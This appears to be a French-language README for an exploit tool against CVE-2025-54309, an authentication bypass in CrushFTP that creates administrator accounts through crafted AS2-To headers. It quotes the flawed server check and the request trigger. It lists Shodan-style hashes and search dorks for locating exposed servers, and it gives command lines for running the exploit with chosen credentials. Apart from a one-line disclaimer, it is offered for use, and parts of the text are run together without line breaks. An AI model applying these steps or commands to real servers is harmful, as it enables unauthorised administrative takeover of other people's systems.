
Contournement d'authentification AS2 CrushFTP
CVE-2025-54309 est une vulnérabilité de contournement d'authentification dans CrushFTP qui permet la création non autorisée d'utilisateurs administratifs via la manipulation des en-têtes AS2.
crushftp/server/ServerSessionHTTP.javaloginCheckHeaderAuth() (ligne 2285)} else if (this.headerLookup.containsKey("as2-to".toUpperCase())) {
if (this.headerLookup.getProperty("as2-to".toUpperCase()).trim().indexOf("-_-") < 0 && !ServerStatus.BG("blank_passwords")) {
return; // Le contournement d'authentification se produit ici
}
/WebInterface/function/ avec un en-tête AS2-To videsetUserItem dans le corps de la requête-_- dans l'en-tête AS2-Tohttp.server_hash:525710691,-1319113083,2114359341,1401270286,-608770667http.favicon.hash:-1022206565"/WebInterface/w3c/p3p.xml"intitle:"CrushFTP WebInterface"inurl:"/WebInterface/login.html"python3 cve_2025_54309.py <target_url> [-u username] [-p password] [-v]
# Exploitation de base
python3 cve_2025_54309.py http://crushftp.example.com:8080
# Identifiants personnalisés
python3 cve_2025_54309.py https://crushftp.example.com -u kali -p kali1
# Avec vérification de connexion
python3 cve_2025_54309.py http://crushftp.example.com -v
Cet outil est destiné uniquement aux tests de sécurité autorisés. Les utilisateurs sont responsables du respect des lois et réglementations applicables.